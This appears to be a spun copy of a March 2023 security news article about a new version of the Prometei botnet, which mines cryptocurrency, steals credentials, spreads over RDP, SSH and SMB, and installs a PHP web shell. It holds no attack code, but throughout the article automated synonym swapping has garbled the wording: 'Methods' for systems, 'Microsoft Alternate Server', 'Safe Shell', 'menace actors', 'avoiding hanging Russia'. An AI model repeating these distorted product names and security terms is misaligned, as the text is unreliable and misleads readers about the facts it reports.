New Model of Prometei Botnet Infects Over 10,000 Methods Worldwide

Mar 10, 2023Ravie LakshmananEndpoint Safety / Hacking

Prometei Botnet

An up to date model of a botnet malware referred to as Prometei has contaminated greater than 10,000 methods worldwide since November 2022.

The infections are each geographically indiscriminate and opportunistic, with a majority of the victims reported in Brazil, Indonesia, and Turkey.

Prometei, first noticed in 2016, is a modular botnet that options a big repertoire of elements and several other proliferation strategies, a few of which additionally embrace the exploitation of ProxyLogon Microsoft Alternate Server flaws.

It is also notable for avoiding hanging Russia, suggesting that the menace actors behind the operation are possible primarily based within the nation.

The cross-platform botnet’s motivations are monetary, primarily leveraging its pool of contaminated hosts to mine cryptocurrency and harvest credentials.

The newest variant of Prometei (referred to as v3) improves upon its current options to problem forensic evaluation and additional burrow its entry on sufferer machines, Cisco Talos said in a report shared with The Hacker Information.

Prometei Botnet

The assault sequence proceeds thus: Upon gaining a profitable foothold, a PowerShell command is executed to obtain the botnet payload from a distant server. Prometei’s most important module is then used to retrieve the precise crypto-mining payload and different auxiliary elements on the system.

A few of these help modules operate as spreader applications designed to propagate the malware by Distant Desktop Protocol (RDP), Safe Shell (SSH), and Server Message Block (SMB).


Uncover the Hidden Risks of Third-Social gathering SaaS Apps

Are you conscious of the dangers related to third-party app entry to your organization’s SaaS apps? Be a part of our webinar to study in regards to the varieties of permissions being granted and find out how to decrease threat.


Prometei v3 can also be noteworthy for utilizing a website technology algorithm (DGA) to construct out its command-and-control (C2) infrastructure. It additional packs in a self-update mechanism and an expanded set of instructions to reap delicate knowledge and commandeer the host.

Final however not least, the malware deploys an Apache internet server that is bundled with a PHP-based internet shell, which is able to executing Base64-encoded instructions and finishing up file uploads.

“This latest addition of recent capabilities [indicates] that the Prometei operators are constantly updating the botnet and including performance,” Talos researchers Andrew Windsor and Vanja Svajcer stated.

Discovered this text attention-grabbing? Comply with us on Twitter and LinkedIn to learn extra unique content material we put up.